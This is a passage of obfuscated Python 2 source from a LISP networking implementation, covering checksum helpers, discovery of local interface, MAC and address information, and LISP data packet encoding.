Oo0 = ( Oo0 >> 16 ) + ( Oo0 & 0xffff )
Oo0 += Oo0 >> 16
Oo0 = socket . htons ( ~ Oo0 & 0xffff )
if 38 - 38: i1IIi . I1ii11iIi11i % Ii1I + iIii1I11I1II1 + O0
if 47 - 47: OoO0O00 + IiII / II111iiii
if 97 - 97: I1ii11iIi11i / I1IiiI % O0 + i1IIi - ooOoO0o
if 38 - 38: o0oOOo0O0Ooo % I1Ii111 + i11iIiiIii + iII111i + ooOoO0o / i11iIiiIii
Oo0 = struct . pack ( "H" , Oo0 )
o0oOo00 = data [ 0 : 6 ] + Oo0 + data [ 8 : : ]
return ( o0oOo00 )
if 94 - 94: iII111i - Oo0Ooo + oO0o
if 59 - 59: I11i . I1IiiI - iIii1I11I1II1 + iIii1I11I1II1
if 56 - 56: oO0o + ooOoO0o
if 32 - 32: II111iiii + OoOoOO00 % ooOoO0o / OoOoOO00 + I1ii11iIi11i
if 2 - 2: i11iIiiIii - I1Ii111 + OoO0O00 % I11i * Ii1I
if 54 - 54: O0 - iII111i . OOooOOo % iII111i + iII111i
if 36 - 36: OOooOOo % i11iIiiIii
if 47 - 47: i1IIi + II111iiii . Oo0Ooo * oO0o . I11i / i1IIi
def lisp_igmp_checksum ( igmp ) :
i11ii = binascii . hexlify ( igmp )
if 83 - 83: I1ii11iIi11i * I1ii11iIi11i + OOooOOo
if 57 - 57: O0 - O0 . I1ii11iIi11i / o0oOOo0O0Ooo / Ii1I
if 20 - 20: OOooOOo * II111iiii - OoOoOO00 - oO0o * I1Ii111
if 6 - 6: ooOoO0o + OOooOOo / Oo0Ooo + IiII % II111iiii / OoO0O00
Oo0 = 0
for IiIIi1IiiIiI in range ( 0 , 24 , 4 ) :
Oo0 += int ( i11ii [ IiIIi1IiiIiI : IiIIi1IiiIiI + 4 ] , 16 )
if 45 - 45: OoooooooOO
if 9 - 9: I11i . OoO0O00 * i1IIi . OoooooooOO
if 32 - 32: OoOoOO00 . I1ii11iIi11i % I1IiiI - II111iiii
if 11 - 11: O0 + I1IiiI
if 80 - 80: oO0o % oO0o % O0 - i11iIiiIii . iII111i / O0
Oo0 = ( Oo0 >> 16 ) + ( Oo0 & 0xffff )
Oo0 += Oo0 >> 16
Oo0 = socket . htons ( ~ Oo0 & 0xffff )
if 13 - 13: I1IiiI + O0 - I1ii11iIi11i % Oo0Ooo / Ii1I . i1IIi
if 60 - 60: Oo0Ooo . IiII % I1IiiI - I1Ii111
if 79 - 79: OoooooooOO / I1ii11iIi11i . O0
if 79 - 79: oO0o - II111iiii
Oo0 = struct . pack ( "H" , Oo0 )
igmp = igmp [ 0 : 2 ] + Oo0 + igmp [ 4 : : ]
return ( igmp )
if 43 - 43: i1IIi + O0 % OoO0O00 / Ii1I * I1IiiI
if 89 - 89: I1IiiI . Oo0Ooo + I1ii11iIi11i . O0 % o0oOOo0O0Ooo
if 84 - 84: OoooooooOO + I1Ii111 / I1IiiI % OOooOOo % I1ii11iIi11i * I1IiiI
if 58 - 58: OoO0O00 - OoOoOO00 . i11iIiiIii % i11iIiiIii / i1IIi / oO0o
if 24 - 24: I1IiiI * i1IIi % ooOoO0o / O0 + i11iIiiIii
if 12 - 12: I1ii11iIi11i / Ii1I
if 5 - 5: OoooooooOO
def lisp_get_interface_address ( device ) :
if 18 - 18: I1IiiI % OoooooooOO - iII111i . i11iIiiIii * Oo0Ooo % Ii1I
if 12 - 12: i1IIi / OOooOOo % ooOoO0o * IiII * O0 * iIii1I11I1II1
if 93 - 93: Oo0Ooo / I1ii11iIi11i + i1IIi * oO0o . OoooooooOO
if 54 - 54: O0 / IiII % ooOoO0o * i1IIi * O0
if ( device not in netifaces . interfaces ( ) ) : return ( None )
if 48 - 48: o0oOOo0O0Ooo . oO0o % OoOoOO00 - OoOoOO00
if 33 - 33: I11i % II111iiii + OoO0O00
if 93 - 93: i1IIi . IiII / I1IiiI + IiII
if 58 - 58: I1ii11iIi11i + O0 . Oo0Ooo + OoOoOO00 - OoO0O00 - OoOoOO00
IIiiI = netifaces . ifaddresses ( device )
if ( IIiiI . has_key ( netifaces . AF_INET ) == False ) : return ( None )
if 36 - 36: iII111i
if 52 - 52: I1Ii111 % O0 . i1IIi . OoooooooOO
if 33 - 33: OOooOOo % II111iiii
if 71 - 71: Ii1I * I1Ii111 % II111iiii . Ii1I % OoO0O00 + I1ii11iIi11i
o0oOo0OO = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
if 79 - 79: OoOoOO00 % I1IiiI % Ii1I / i1IIi % OoO0O00
for IiiIIi1 in IIiiI [ netifaces . AF_INET ] :
oo0o00OO = IiiIIi1 [ "addr" ]
o0oOo0OO . store_address ( oo0o00OO )
return ( o0oOo0OO )
if 69 - 69: o0oOOo0O0Ooo % i11iIiiIii / Ii1I
return ( None )
if 93 - 93: ooOoO0o
if 34 - 34: oO0o - ooOoO0o * Oo0Ooo / o0oOOo0O0Ooo
if 19 - 19: I1ii11iIi11i
if 46 - 46: iIii1I11I1II1 . i11iIiiIii - OoOoOO00 % O0 / II111iiii * i1IIi
if 66 - 66: O0
if 52 - 52: OoO0O00 * OoooooooOO
if 12 - 12: O0 + IiII * i1IIi . OoO0O00
if 71 - 71: I1Ii111 - o0oOOo0O0Ooo - OOooOOo
if 28 - 28: iIii1I11I1II1
if 7 - 7: o0oOOo0O0Ooo % IiII * OoOoOO00
if 58 - 58: IiII / I11i + II111iiii % iII111i - OoooooooOO
if 25 - 25: OoOoOO00 % OoooooooOO * Oo0Ooo - i1IIi * II111iiii * oO0o
def lisp_get_input_interface ( packet ) :
I1iI1I1ii1 = lisp_format_packet ( packet [ 0 : 12 ] ) . replace ( " " , "" )
iIIi1 = I1iI1I1ii1 [ 0 : 12 ]
o0Ooo0o0Oo = I1iI1I1ii1 [ 12 : : ]
if 55 - 55: iIii1I11I1II1 * iII111i
try : oo = lisp_mymacs . has_key ( o0Ooo0o0Oo )
except : oo = False
if 30 - 30: O0 + OOooOOo % Oo0Ooo . i1IIi
if ( lisp_mymacs . has_key ( iIIi1 ) ) : return ( lisp_mymacs [ iIIi1 ] , o0Ooo0o0Oo , iIIi1 , oo )
if ( oo ) : return ( lisp_mymacs [ o0Ooo0o0Oo ] , o0Ooo0o0Oo , iIIi1 , oo )
return ( [ "?" ] , o0Ooo0o0Oo , iIIi1 , oo )
if 4 - 4: OOooOOo / iII111i * I11i - Oo0Ooo * I1IiiI
if 6 - 6: Ii1I
if 77 - 77: i1IIi + OoO0O00 . I1IiiI * OOooOOo / IiII / Ii1I
if 84 - 84: OoO0O00 / iIii1I11I1II1
if 33 - 33: i1IIi / I1Ii111 - i1IIi . Oo0Ooo
if 18 - 18: Oo0Ooo / O0 + iII111i
if 65 - 65: i1IIi . I1ii11iIi11i / ooOoO0o
if 11 - 11: IiII * ooOoO0o / ooOoO0o - OOooOOo
def lisp_get_local_interfaces ( ) :
for OoO0o0OOOO in netifaces . interfaces ( ) :
II1i = lisp_interface ( OoO0o0OOOO )
II1i . add_interface ( )
if 62 - 62: I11i / oO0o % Oo0Ooo . OoooooooOO / i11iIiiIii / I1Ii111
return
if 60 - 60: I1IiiI % oO0o / o0oOOo0O0Ooo % oO0o * i11iIiiIii / iII111i
if 34 - 34: I1Ii111 - OOooOOo
if 25 - 25: oO0o % I1IiiI + i11iIiiIii + O0 * OoooooooOO
if 64 - 64: i1IIi
if 10 - 10: I1Ii111 % O0 / I1IiiI % I11i
if 25 - 25: II111iiii / OoO0O00
if 64 - 64: O0 % ooOoO0o
def lisp_get_loopback_address ( ) :
for IiiIIi1 in netifaces . ifaddresses ( "lo" ) [ netifaces . AF_INET ] :
if ( IiiIIi1 [ "peer" ] == "127.0.0.1" ) : continue
return ( IiiIIi1 [ "peer" ] )
if 40 - 40: o0oOOo0O0Ooo + I11i
return ( None )
if 77 - 77: i11iIiiIii % IiII + I1Ii111 % OoooooooOO - I11i
if 26 - 26: Oo0Ooo + O0 - iIii1I11I1II1
if 47 - 47: OoooooooOO
if 2 - 2: OoOoOO00 % I1Ii111 * Oo0Ooo * OoOoOO00
if 65 - 65: i11iIiiIii + Oo0Ooo * OoooooooOO - OoO0O00
if 26 - 26: o0oOOo0O0Ooo % OOooOOo + OOooOOo % I11i * i11iIiiIii / iII111i
if 64 - 64: oO0o % OoOoOO00 / II111iiii % ooOoO0o - iII111i
if 2 - 2: I1Ii111 - I1ii11iIi11i + o0oOOo0O0Ooo * OoO0O00 / iII111i
def lisp_is_mac_string ( mac_str ) :
Ii = mac_str . split ( "/" )
if ( len ( Ii ) == 2 ) : mac_str = Ii [ 0 ]
return ( len ( mac_str ) == 14 and mac_str . count ( "-" ) == 2 )
if 26 - 26: OOooOOo * Oo0Ooo
if 31 - 31: I11i * oO0o . Ii1I
if 35 - 35: I11i
if 94 - 94: ooOoO0o / i11iIiiIii % O0
if 70 - 70: I11i - Oo0Ooo / OoooooooOO % OoooooooOO
if 95 - 95: OoooooooOO % OoooooooOO . Ii1I
if 26 - 26: oO0o + IiII - II111iiii . II111iiii + I1ii11iIi11i + OoOoOO00
if 68 - 68: O0
def lisp_get_local_macs ( ) :
for OoO0o0OOOO in netifaces . interfaces ( ) :
if 76 - 76: I1ii11iIi11i
if 99 - 99: o0oOOo0O0Ooo
if 1 - 1: Ii1I * OoOoOO00 * OoO0O00 + Oo0Ooo
if 90 - 90: I1Ii111 % Oo0Ooo - Oo0Ooo . iIii1I11I1II1 / OOooOOo + I11i
if 89 - 89: oO0o
OooOOOoOoo0O0 = OoO0o0OOOO . replace ( ":" , "" )
OooOOOoOoo0O0 = OoO0o0OOOO . replace ( "-" , "" )
if ( OooOOOoOoo0O0 . isalnum ( ) == False ) : continue
if 87 - 87: iII111i % Oo0Ooo
if 62 - 62: OoO0O00 + ooOoO0o / iII111i * i11iIiiIii
if 37 - 37: iII111i
if 33 - 33: OoO0O00 - O0 - OoO0O00
if 94 - 94: IiII * I11i * OoooooooOO / o0oOOo0O0Ooo . IiII - o0oOOo0O0Ooo
try :
I1I1i = netifaces . ifaddresses ( OoO0o0OOOO )
except :
continue
if 45 - 45: OOooOOo
if ( I1I1i . has_key ( netifaces . AF_LINK ) == False ) : continue
Ii = I1I1i [ netifaces . AF_LINK ] [ 0 ] [ "addr" ]
Ii = Ii . replace ( ":" , "" )
if 25 - 25: OOooOOo % O0
if 44 - 44: I1Ii111 . Ii1I * II111iiii / IiII + iIii1I11I1II1
if 14 - 14: O0 % IiII % Ii1I * oO0o
if 65 - 65: I11i % oO0o + I1ii11iIi11i
if 86 - 86: iIii1I11I1II1 / O0 . I1Ii111 % iIii1I11I1II1 % Oo0Ooo
if ( len ( Ii ) < 12 ) : continue
if 86 - 86: i11iIiiIii - o0oOOo0O0Ooo . ooOoO0o * Oo0Ooo / Ii1I % o0oOOo0O0Ooo
if ( lisp_mymacs . has_key ( Ii ) == False ) : lisp_mymacs [ Ii ] = [ ]
lisp_mymacs [ Ii ] . append ( OoO0o0OOOO )
if 61 - 61: o0oOOo0O0Ooo + OoOoOO00
if 15 - 15: OoOoOO00 * oO0o + OOooOOo . I11i % I1IiiI - ooOoO0o
lprint ( "Local MACs are: {}" . format ( lisp_mymacs ) )
return
if 13 - 13: OoOoOO00 % OoOoOO00 % Oo0Ooo % I1IiiI * i1IIi % I11i
if 82 - 82: IiII . OoOoOO00 / ooOoO0o + iII111i - ooOoO0o
if 55 - 55: ooOoO0o % Oo0Ooo % o0oOOo0O0Ooo
if 29 - 29: IiII / iIii1I11I1II1 + I1ii11iIi11i % iII111i % I11i
if 46 - 46: iIii1I11I1II1
if 70 - 70: i1IIi . I11i
if 74 - 74: I11i
if 58 - 58: iIii1I11I1II1 * OoO0O00 * I1Ii111 * ooOoO0o . OoooooooOO
def lisp_get_local_rloc ( ) :
II1IIiiI1 = commands . getoutput ( "netstat -rn | egrep 'default|0.0.0.0'" )
if ( II1IIiiI1 == "" ) : return ( lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 ) )
if 96 - 96: OOooOOo + OOooOOo % IiII % OOooOOo
if 28 - 28: iIii1I11I1II1 + OoOoOO00 . o0oOOo0O0Ooo % i11iIiiIii
if 58 - 58: I11i / OoooooooOO % oO0o + OoO0O00
if 58 - 58: O0
II1IIiiI1 = II1IIiiI1 . split ( "\n" ) [ 0 ]
OoO0o0OOOO = II1IIiiI1 . split ( ) [ - 1 ]
if 91 - 91: iII111i / I1ii11iIi11i . iII111i - o0oOOo0O0Ooo + I1ii11iIi11i
IiiIIi1 = ""
O00 = lisp_is_macos ( )
if ( O00 ) :
II1IIiiI1 = commands . getoutput ( "ifconfig {} | egrep 'inet '" . format ( OoO0o0OOOO ) )
if ( II1IIiiI1 == "" ) : return ( lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 ) )
else :
ooO0ooooO = 'ip addr show | egrep "inet " | egrep "{}"' . format ( OoO0o0OOOO )
II1IIiiI1 = commands . getoutput ( ooO0ooooO )
if ( II1IIiiI1 == "" ) :
ooO0ooooO = 'ip addr show | egrep "inet " | egrep "global lo"'
II1IIiiI1 = commands . getoutput ( ooO0ooooO )
if 86 - 86: ooOoO0o
if ( II1IIiiI1 == "" ) : return ( lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 ) )
if 51 - 51: OoO0O00 - i11iIiiIii * I1IiiI
if 95 - 95: OOooOOo % I1ii11iIi11i + o0oOOo0O0Ooo % ooOoO0o
if 36 - 36: O0 / i1IIi % II111iiii / iII111i
if 96 - 96: Oo0Ooo / oO0o . II111iiii . Oo0Ooo
if 91 - 91: II111iiii . OOooOOo + o0oOOo0O0Ooo
if 8 - 8: OOooOOo * Oo0Ooo / iII111i - OoO0O00 - OoooooooOO
IiiIIi1 = ""
II1IIiiI1 = II1IIiiI1 . split ( "\n" )
if 100 - 100: oO0o . iIii1I11I1II1 . iIii1I11I1II1
for oOOo0ooO0 in II1IIiiI1 :
OO0o = oOOo0ooO0 . split ( ) [ 1 ]
if ( O00 == False ) : OO0o = OO0o . split ( "/" ) [ 0 ]
ii1i1II11II1i = lisp_address ( LISP_AFI_IPV4 , OO0o , 32 , 0 )
return ( ii1i1II11II1i )
if 95 - 95: I11i + o0oOOo0O0Ooo * I1ii11iIi11i
return ( lisp_address ( LISP_AFI_IPV4 , IiiIIi1 , 32 , 0 ) )
if 85 - 85: i11iIiiIii . OoooooooOO - iIii1I11I1II1
if 38 - 38: I11i . I11i * oO0o / OoooooooOO % ooOoO0o
if 80 - 80: OoO0O00 / IiII * I1IiiI % IiII
if 95 - 95: O0 / I11i . I1Ii111
if 17 - 17: I11i
if 56 - 56: ooOoO0o * o0oOOo0O0Ooo + I11i
if 48 - 48: IiII * OoO0O00 % I1Ii111 - I11i
if 72 - 72: i1IIi % ooOoO0o % IiII % oO0o - oO0o
if 97 - 97: o0oOOo0O0Ooo * O0 / o0oOOo0O0Ooo * OoO0O00 * Oo0Ooo
if 38 - 38: I1Ii111
if 25 - 25: iIii1I11I1II1 % II111iiii / I11i / I1ii11iIi11i
def lisp_get_local_addresses ( ) :
global lisp_myrlocs
if 22 - 22: oO0o * iII111i
if 4 - 4: OoOoOO00 - oO0o + I1IiiI
if 36 - 36: IiII
if 19 - 19: OoOoOO00 . o0oOOo0O0Ooo . OoooooooOO
if 13 - 13: OOooOOo . Oo0Ooo / II111iiii
if 43 - 43: iIii1I11I1II1 % OoO0O00
if 84 - 84: Oo0Ooo
if 44 - 44: OoooooooOO * i11iIiiIii / Oo0Ooo
if 75 - 75: OoooooooOO . OOooOOo + OoO0O00 / Ii1I - I1IiiI % Ii1I
if 89 - 89: iII111i * iIii1I11I1II1 + i11iIiiIii . OoooooooOO
O0O0 = None
ooo = 1
oO0oo = os . getenv ( "LISP_ADDR_SELECT" )
if ( oO0oo != None and oO0oo != "" ) :
oO0oo = oO0oo . split ( ":" )
if ( len ( oO0oo ) == 2 ) :
O0O0 = oO0oo [ 0 ]
ooo = oO0oo [ 1 ]
else :
if ( oO0oo [ 0 ] . isdigit ( ) ) :
ooo = oO0oo [ 0 ]
else :
O0O0 = oO0oo [ 0 ]
if 52 - 52: IiII % ooOoO0o
if 25 - 25: I11i / I11i % OoooooooOO - I1ii11iIi11i * oO0o
ooo = 1 if ( ooo == "" ) else int ( ooo )
if 23 - 23: i11iIiiIii
if 100 - 100: oO0o + O0 . I1IiiI + i1IIi - OoOoOO00 + o0oOOo0O0Ooo
ooOOo = [ None , None , None ]
i1 = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
iii1IiiiI1i1 = lisp_address ( LISP_AFI_IPV6 , "" , 128 , 0 )
IIIiI1i1 = None
if 13 - 13: OOooOOo * I11i / O0 * o0oOOo0O0Ooo
for OoO0o0OOOO in netifaces . interfaces ( ) :
if ( O0O0 != None and O0O0 != OoO0o0OOOO ) : continue
IIiiI = netifaces . ifaddresses ( OoO0o0OOOO )
if ( IIiiI == { } ) : continue
if 35 - 35: i1IIi * i11iIiiIii % I1ii11iIi11i / IiII / IiII
if 91 - 91: OoO0O00 * I1Ii111 % OoO0O00 . o0oOOo0O0Ooo * I1ii11iIi11i . OOooOOo
if 13 - 13: I1ii11iIi11i
if 80 - 80: Oo0Ooo % IiII % OoooooooOO * Oo0Ooo % Ii1I
IIIiI1i1 = lisp_get_interface_instance_id ( OoO0o0OOOO , None )
if 41 - 41: OoooooooOO / i1IIi
if 70 - 70: OoOoOO00 % o0oOOo0O0Ooo % i1IIi / I1ii11iIi11i % i11iIiiIii / i1IIi
if 4 - 4: IiII
if 93 - 93: oO0o % i1IIi
if ( IIiiI . has_key ( netifaces . AF_INET ) ) :
IIi1 = IIiiI [ netifaces . AF_INET ]
OO = 0
for IiiIIi1 in IIi1 :
i1 . store_address ( IiiIIi1 [ "addr" ] )
if ( i1 . is_ipv4_loopback ( ) ) : continue
if ( i1 . is_ipv4_link_local ( ) ) : continue
if ( i1 . address == 0 ) : continue
OO += 1
i1 . instance_id = IIIiI1i1
if ( O0O0 == None and
lisp_db_for_lookups . lookup_cache ( i1 , False ) ) : continue
ooOOo [ 0 ] = i1
if ( OO == ooo ) : break
if 61 - 61: I11i . I11i - OoO0O00
if 62 - 62: iII111i . iII111i
if ( IIiiI . has_key ( netifaces . AF_INET6 ) ) :
OoO0oO = IIiiI [ netifaces . AF_INET6 ]
OO = 0
for IiiIIi1 in OoO0oO :
oo0o00OO = IiiIIi1 [ "addr" ]
iii1IiiiI1i1 . store_address ( oo0o00OO )
if ( iii1IiiiI1i1 . is_ipv6_string_link_local ( oo0o00OO ) ) : continue
if ( iii1IiiiI1i1 . is_ipv6_loopback ( ) ) : continue
OO += 1
iii1IiiiI1i1 . instance_id = IIIiI1i1
if ( O0O0 == None and
lisp_db_for_lookups . lookup_cache ( iii1IiiiI1i1 , False ) ) : continue
ooOOo [ 1 ] = iii1IiiiI1i1
if ( OO == ooo ) : break
if 22 - 22: ooOoO0o / ooOoO0o - Ii1I % I11i . OOooOOo + IiII
if 64 - 64: i1IIi % I1ii11iIi11i / Ii1I % OoooooooOO
if 24 - 24: I1Ii111 + OoooooooOO . IiII / OoOoOO00 / I11i
if 65 - 65: OoooooooOO
if 18 - 18: O0 - i1IIi . I1Ii111
if 98 - 98: o0oOOo0O0Ooo
if ( ooOOo [ 0 ] == None ) : continue
if 73 - 73: Oo0Ooo - iII111i . oO0o % i1IIi . O0
ooOOo [ 2 ] = OoO0o0OOOO
break
if 15 - 15: ooOoO0o . iIii1I11I1II1 * I1IiiI % I11i
if 21 - 21: OoO0O00 - I1IiiI . OoooooooOO
Ii1iiI1i1 = ooOOo [ 0 ] . print_address_no_iid ( ) if ooOOo [ 0 ] else "none"
iIi = ooOOo [ 1 ] . print_address_no_iid ( ) if ooOOo [ 1 ] else "none"
OoO0o0OOOO = ooOOo [ 2 ] if ooOOo [ 2 ] else "none"
if 88 - 88: iII111i * OoooooooOO . iIii1I11I1II1
O0O0 = " (user selected)" if O0O0 != None else ""
if 11 - 11: oO0o + I1Ii111 . IiII * OoooooooOO - I1ii11iIi11i - OOooOOo
Ii1iiI1i1 = red ( Ii1iiI1i1 , False )
iIi = red ( iIi , False )
OoO0o0OOOO = bold ( OoO0o0OOOO , False )
lprint ( "Local addresses are IPv4: {}, IPv6: {} from device {}{}, iid {}" . format ( Ii1iiI1i1 , iIi , OoO0o0OOOO , O0O0 , IIIiI1i1 ) )
if 16 - 16: iII111i / iIii1I11I1II1 + OOooOOo * iII111i * I11i
if 8 - 8: I1Ii111
lisp_myrlocs = ooOOo
return ( ( ooOOo [ 0 ] != None ) )
if 15 - 15: Oo0Ooo / Ii1I % O0 + I1ii11iIi11i
if 96 - 96: ooOoO0o . OoooooooOO
if 39 - 39: OOooOOo + OoO0O00
if 80 - 80: OOooOOo % OoO0O00 / OoOoOO00
if 54 - 54: Oo0Ooo % OoO0O00 - OOooOOo - I11i
if 71 - 71: ooOoO0o . i11iIiiIii
if 56 - 56: O0 * iII111i + iII111i * iIii1I11I1II1 / ooOoO0o * I1Ii111
if 25 - 25: iIii1I11I1II1 . I11i * i11iIiiIii + Oo0Ooo * I11i
if 67 - 67: iII111i
def lisp_get_all_addresses ( ) :
oooO0o = [ ]
for II1i in netifaces . interfaces ( ) :
try : I1iII11ii1 = netifaces . ifaddresses ( II1i )
except : continue
if 4 - 4: i11iIiiIii - OOooOOo % I1ii11iIi11i * I1Ii111 % o0oOOo0O0Ooo
if ( I1iII11ii1 . has_key ( netifaces . AF_INET ) ) :
for IiiIIi1 in I1iII11ii1 [ netifaces . AF_INET ] :
OO0o = IiiIIi1 [ "addr" ]
if ( OO0o . find ( "127.0.0.1" ) != - 1 ) : continue
oooO0o . append ( OO0o )
if 71 - 71: ooOoO0o . ooOoO0o - iIii1I11I1II1
if 22 - 22: OoooooooOO / I1ii11iIi11i % iII111i * OoOoOO00
if ( I1iII11ii1 . has_key ( netifaces . AF_INET6 ) ) :
for IiiIIi1 in I1iII11ii1 [ netifaces . AF_INET6 ] :
OO0o = IiiIIi1 [ "addr" ]
if ( OO0o == "::1" ) : continue
if ( OO0o [ 0 : 5 ] == "fe80:" ) : continue
oooO0o . append ( OO0o )
if 32 - 32: OoooooooOO % oO0o % iIii1I11I1II1 / O0
if 61 - 61: II111iiii . O0 - Ii1I - I1ii11iIi11i / i11iIiiIii - II111iiii
if 98 - 98: Ii1I - I1IiiI . i11iIiiIii * Oo0Ooo
return ( oooO0o )
if 29 - 29: Ii1I / ooOoO0o % I11i
if 10 - 10: iIii1I11I1II1 % OoooooooOO % I1ii11iIi11i
if 39 - 39: II111iiii * OoOoOO00 . O0 * I11i
if 89 - 89: Ii1I - ooOoO0o . I11i - I1Ii111 - I1IiiI
if 79 - 79: IiII + IiII + Ii1I
if 39 - 39: O0 - OoooooooOO
if 63 - 63: iIii1I11I1II1 % o0oOOo0O0Ooo * ooOoO0o
if 79 - 79: O0
def lisp_get_all_multicast_rles ( ) :
IiI = [ ]
II1IIiiI1 = commands . getoutput ( 'egrep "rle-address =" ./lisp.config' )
if ( II1IIiiI1 == "" ) : return ( IiI )
if 9 - 9: II111iiii % OoOoOO00
IiiIi1I11 = II1IIiiI1 . split ( "\n" )
for oOOo0ooO0 in IiiIi1I11 :
if ( oOOo0ooO0 [ 0 ] == "#" ) : continue
i1I1Ii11II1i = oOOo0ooO0 . split ( "rle-address = " ) [ 1 ]
oooOoOOoOO0O = int ( i1I1Ii11II1i . split ( "." ) [ 0 ] )
if ( oooOoOOoOO0O >= 224 and oooOoOOoOO0O < 240 ) : IiI . append ( i1I1Ii11II1i )
if 9 - 9: I1Ii111 * OoooooooOO % I1IiiI / OoOoOO00 * I11i
return ( IiI )
if 48 - 48: OoooooooOO . OoOoOO00
if 65 - 65: oO0o . Oo0Ooo
if 94 - 94: OoOoOO00 + IiII . ooOoO0o
if 69 - 69: O0 - O0
if 41 - 41: IiII % o0oOOo0O0Ooo
if 67 - 67: O0 % I1Ii111
if 35 - 35: I1IiiI . OoOoOO00 + OoooooooOO % Oo0Ooo % OOooOOo
if 39 - 39: Ii1I
class lisp_packet ( ) :
def __init__ ( self , packet ) :
self . outer_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . outer_dest = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . outer_tos = 0
self . outer_ttl = 0
self . udp_sport = 0
self . udp_dport = 0
self . udp_length = 0
self . udp_checksum = 0
self . inner_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . inner_dest = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . inner_tos = 0
self . inner_ttl = 0
self . inner_protocol = 0
self . inner_sport = 0
self . inner_dport = 0
self . lisp_header = lisp_data_header ( )
self . packet = packet
self . inner_version = 0
self . outer_version = 0
self . encap_port = LISP_DATA_PORT
self . inner_is_fragment = False
self . packet_error = ""
self . gleaned_dest = False
if 60 - 60: OOooOOo
if 62 - 62: I1Ii111 * I11i
def encode ( self , nonce ) :
if 74 - 74: OoOoOO00 . iIii1I11I1II1
if 87 - 87: ooOoO0o
if 41 - 41: OoOoOO00 . iIii1I11I1II1 % ooOoO0o + O0
if 22 - 22: o0oOOo0O0Ooo + Oo0Ooo . ooOoO0o + I1ii11iIi11i * iII111i . i11iIiiIii
if 90 - 90: OOooOOo * OoOoOO00 - Oo0Ooo + o0oOOo0O0Ooo
if ( self . outer_source . is_null ( ) ) : return ( None )
if 53 - 53: OoooooooOO . OoooooooOO + o0oOOo0O0Ooo - iII111i + OOooOOo
if 44 - 44: I1Ii111 - IiII
if 100 - 100: oO0o . OoO0O00 - Ii1I + O0 * OoO0O00
if 59 - 59: II111iiii
if 43 - 43: Oo0Ooo + OoooooooOO
if 47 - 47: ooOoO0o
if ( nonce == None ) :
self . lisp_header . nonce ( lisp_get_data_nonce ( ) )
elif ( self . lisp_header . is_request_nonce ( nonce ) ) :
self . lisp_header . request_nonce ( nonce )
else :
self . lisp_header . nonce ( nonce )
if 92 - 92: I11i % i11iIiiIii % Oo0Ooo
self . lisp_header . instance_id ( self . inner_dest . instance_id )
if 23 - 23: II111iiii * iII111i
if 80 - 80: I1Ii111 / i11iIiiIii + OoooooooOO
if 38 - 38: I1ii11iIi11i % ooOoO0o + i1IIi * OoooooooOO * oO0o
if 83 - 83: iIii1I11I1II1 - ooOoO0o - I1Ii111 / OoO0O00 - O0
if 81 - 81: Ii1I - oO0o * I1ii11iIi11i / I1Ii111
if 21 - 21: OoO0O00
self . lisp_header . key_id ( 0 )
O0o0oOOO = ( self . lisp_header . get_instance_id ( ) == 0xffffff )
if ( lisp_data_plane_security and O0o0oOOO == False ) :
oo0o00OO = self . outer_dest . print_address_no_iid ( ) + ":" + str ( self . encap_port )
if 24 - 24: o0oOOo0O0Ooo / Ii1I / Ii1I % II111iiii - oO0o * oO0o
if ( lisp_crypto_keys_by_rloc_encap . has_key ( oo0o00OO ) ) :
oOoo0oO = lisp_crypto_keys_by_rloc_encap [ oo0o00OO ]
if ( oOoo0oO [ 1 ] ) :
oOoo0oO [ 1 ] . use_count += 1
IIii1i , o00oo = self . encrypt ( oOoo0oO [ 1 ] , oo0o00OO )
if ( o00oo ) : self . packet = IIii1i
if 18 - 18: i11iIiiIii - ooOoO0o * oO0o + o0oOOo0O0Ooo
if 16 - 16: OoooooooOO * i11iIiiIii . OoooooooOO - iIii1I11I1II1 * i1IIi
if 33 - 33: I1Ii111 % II111iiii
if 49 - 49: I1ii11iIi11i + I11i / o0oOOo0O0Ooo + OoooooooOO + OOooOOo / IiII
if 29 - 29: Ii1I - Ii1I / ooOoO0o
if 49 - 49: I11i + oO0o % OoO0O00 - Oo0Ooo - O0 - OoooooooOO
if 4 - 4: II111iiii - oO0o % Oo0Ooo * i11iIiiIii
if 18 - 18: Oo0Ooo % O0
self . udp_checksum = 0
if ( self . encap_port == LISP_DATA_PORT ) :
if ( lisp_crypto_ephem_port == None ) :
if ( self . gleaned_dest ) :
self . udp_sport = LISP_DATA_PORT
else :
self . hash_packet ( )
if 66 - 66: iIii1I11I1II1 % i11iIiiIii / I1IiiI
else :
self . udp_sport = lisp_crypto_ephem_port
if 47 - 47: I1ii11iIi11i * oO0o + iIii1I11I1II1 - oO0o / IiII
else :
self . udp_sport = LISP_DATA_PORT
if 86 - 86: IiII
self . udp_dport = self . encap_port
self . udp_length = len ( self . packet ) + 16
if 43 - 43: I1IiiI / iII111i / ooOoO0o + iIii1I11I1II1 + OoooooooOO
if 33 - 33: II111iiii - IiII - ooOoO0o
if 92 - 92: OoO0O00 * IiII
if 92 - 92: oO0o
if ( self . outer_version == 4 ) :
i1i1IIiII1I = socket . htons ( self . udp_sport )
OOO = socket . htons ( self . udp_dport )
else :
i1i1IIiII1I = self . udp_sport
OOO = self . udp_dport
if 3 - 3: i11iIiiIii
if 11 - 11: OoO0O00 % OoooooooOO
OOO = socket . htons ( self . udp_dport ) if self . outer_version == 4 else self . udp_dport
if 20 - 20: I1Ii111 + I1Ii111 * II111iiii * iIii1I11I1II1 % O0 * I1IiiI
if 62 - 62: OoooooooOO / OoOoOO00 . IiII . IiII % ooOoO0o
o0oOo00 = struct . pack ( "HHHH" , i1i1IIiII1I , OOO , socket . htons ( self . udp_length ) ,
self . udp_checksum )
if 42 - 42: o0oOOo0O0Ooo . OOooOOo - ooOoO0o
if 33 - 33: II111iiii / O0 / IiII - I11i - i1IIi
if 8 - 8: i11iIiiIii . iII111i / iIii1I11I1II1 / I1ii11iIi11i / IiII - Ii1I
if 32 - 32: o0oOOo0O0Ooo . i1IIi * Oo0Ooo
O0oooo0O = self . lisp_header . encode ( )
if 15 - 15: i1IIi % OoooooooOO * OOooOOo . II111iiii + O0 * OoO0O00
if 16 - 16: O0 - O0 / I11i - OoO0O00
